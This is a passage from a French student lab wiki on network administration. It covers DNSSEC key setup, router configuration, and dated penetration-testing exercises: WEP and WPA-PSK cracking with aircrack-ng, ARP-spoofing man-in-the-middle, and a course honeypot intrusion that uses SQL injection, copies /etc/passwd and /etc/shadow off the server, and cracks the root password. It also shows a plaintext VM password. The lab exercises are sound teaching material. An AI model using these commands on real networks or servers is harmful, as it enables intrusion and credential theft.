Nous avons ensuite crée un repertoir trompettedelamort.dnssec afin d'y générer les clefs. Nous devons générer une paire de clef KSK et une paire de clef ZSK.&lt;br /&gt;
&lt;br /&gt;
Pour créer la paire de clef KSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Et pour la paire de clef ZSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Nous renommons ces paires avec comme prefixe trompettedelamort.site et comme suffice -zsk pour la paire zsk et -ksk pour la paire ksk et nous terminon avec .key pour les clefs publiques et .private pour les clefs privées.&lt;br /&gt;
&lt;br /&gt;
Ensuite dans notre fichier zone db.trompettedelamort.site nous ajoutons les lignes suivantes sans oublier d'incrémenter le  Serial:&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-zsk.key&lt;br /&gt;
&lt;br /&gt;
Le fichier db.trompettedelamort.site ressemble donc à cela:&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @ 	IN	SOA	 ns1.trompettedelamort.site.  postmaster.trompettedelamort.site.(&lt;br /&gt;
&lt;br /&gt;
			      8		; Serial&lt;br /&gt;
			 604800		; Refresh&lt;br /&gt;
			  86400		; Retry&lt;br /&gt;
			2419200		; Expire&lt;br /&gt;
			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.trompettedelamort.site.&lt;br /&gt;
 @	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @	IN	MX	100 ns1.trompettedelamort.site.&lt;br /&gt;
 ns1	IN	A       193.48.57.188&lt;br /&gt;
 www	IN	A	193.48.57.188	&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les enregristrement de la zone avec la commande suivante:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
Ce qui a pour effet de générer un fichier zone &amp;quot;db.trompettedelamort.site.signed&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous n'avons donc plus qu'a remplacer db.trompettedelamort.site par db.trompettedelamort.site.signed dans le fichier named.conf.local:&lt;br /&gt;
 root@trompettedelamort:~# cat /etc/bind/named.conf.local   &lt;br /&gt;
 //&lt;br /&gt;
 // Do any local configuration here&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site.signed&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
 // Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
 // organization&lt;br /&gt;
 //include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne reste plus qu'a fournir la clef publique de la clef KSK à gandi.net. Pour se faire il faut se rendre dans &amp;quot;DNSSEC&amp;quot; puis dans &amp;quot;Add an external key&amp;quot;, choisir KSK et &amp;quot;RSA/SHA-1&amp;quot; et renseigner la clef se trouvant dans&lt;br /&gt;
 /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key &lt;br /&gt;
&lt;br /&gt;
On vérifie avec la commande suivante:&lt;br /&gt;
 dnssec-verify -o trompettedelamort.site db.trompettedelamort.site.signed&lt;br /&gt;
 &lt;br /&gt;
Qui nous renvoie ce résultat:&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.trompettedelamort.site.signed&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53850</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53850"/>
				<updated>2020-11-16T23:08:49Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (16/11/2020)==&lt;br /&gt;
(En collaboration avec le groupe 14)&lt;br /&gt;
&lt;br /&gt;
On connecte physiquement l'ISR au SDSL: Dans le local technique SR52, on repere sur quel port est branché le l'ÍSR pour le mettre dans le VLAN 531&lt;br /&gt;
 conf t&lt;br /&gt;
 int Gi0/37&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 531&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Sur l'ISR:&lt;br /&gt;
* On creer le vlan 531:&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 531&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
